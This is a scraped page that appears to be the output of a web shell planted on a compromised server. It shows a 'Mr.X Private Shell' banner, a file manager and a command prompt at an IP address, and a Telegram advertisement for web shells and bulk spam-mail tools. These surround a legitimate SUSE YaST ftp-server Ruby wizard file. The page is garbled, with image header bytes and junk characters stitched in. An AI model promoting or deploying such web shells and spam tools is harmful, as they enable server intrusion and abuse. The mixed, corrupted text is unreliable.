xNightR00T File Manager

Loading...
Current Directory:
Name Size Permission Modified Actions
Loading...
$ Waiting for command...
����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

ftpuser@216.73.216.168: ~ $
# encoding: utf-8

# File:	include/ftp-server/wizards.ycp
# Package:	Configuration of ftp-server
# Summary:	Wizards definitions
# Authors:	Jozef Uhliarik <juhliarik@suse.cz>
#
# $Id: wizards.ycp 27914 2006-02-13 14:32:08Z juhliarik $
module Yast
  module FtpServerWizardsInclude
    def initialize_ftp_server_wizards(include_target)
      Yast.import "UI"

      textdomain "ftp-server"

      Yast.import "Sequencer"
      Yast.import "Wizard"

      Yast.include include_target, "ftp-server/complex.rb"
      Yast.include include_target, "ftp-server/dialogs.rb"
    end

    def RunDaemonSwitch
      if FtpServer.vsftpd_edit
        return :vsftpd
      else
        return :pureftpd
      end
    end

    # Main workflow of the ftp-server configuration
    # @return sequence result
    def MainSequence
      aliases = {
        "init"     => [lambda { RunDaemonSwitch() }, false],
        "vsftpd"   => lambda { RunFTPDialogsVsftpd() },
        "pureftpd" => lambda { RunFTPDialogsPureftpd() }
      }

      sequence = {
        "ws_start" => "init",
        "init"     => { :pureftpd => "pureftpd", :vsftpd => "vsftpd" },
        "pureftpd" => { :abort => :abort, :next => :next, :vsftpd => "vsftpd" },
        "vsftpd"   => {
          :abort    => :abort,
          :next     => :next,
          :pureftpd => "pureftpd"
        }
      }
      temp = Empty()
      Wizard.SetContents("", temp, "", false, false)
      ret = Sequencer.Run(aliases, sequence)
      deep_copy(ret)
    end


    # Whole configuration of ftp-server
    # @return sequence result
    def FtpdSequence
      aliases = {
        "read"  => [lambda { ReadDialog() }, true],
        "main"  => lambda { MainSequence() },
        "write" => [lambda { WriteDialog() }, true]
      }

      sequence = {
        "ws_start" => "read",
        "read"     => { :abort => :abort, :next => "main" },
        "main"     => { :abort => :abort, :next => "write" },
        "write"    => { :abort => :abort, :next => :next }
      }

      Wizard.CreateDialog
      Wizard.SetDesktopTitleAndIcon("ftp-server")
      ret = Sequencer.Run(aliases, sequence)

      UI.CloseDialog
      deep_copy(ret)
    end

    # Whole configuration of ftp-server but without reading and writing.
    # For use with autoinstallation.
    # @return sequence result
    def FtpServerAutoSequence
      aliases = { "main" => lambda { MainSequence() } }

      sequence = {
        "ws_start" => "main",
        "main"     => { :abort => :abort, :next => :next }
      }

      Wizard.CreateDialog
      Wizard.SetDesktopTitleAndIcon("ftp-server")

      ret = Sequencer.Run(aliases, sequence)

      UI.CloseDialog
      deep_copy(ret)
    end
  end
end

Filemanager

Name Type Size Permission Actions
complex.rb File 8.01 KB 0644
dialogs.rb File 44.87 KB 0644
helps.rb File 12.01 KB 0644
wid_functions.rb File 48.03 KB 0644
wizards.rb File 2.64 KB 0644
write_load.rb File 45.45 KB 0644
Σ(゚Д゚;≡;゚д゚)duo❤️a@$%^🥰&%PDF-0-1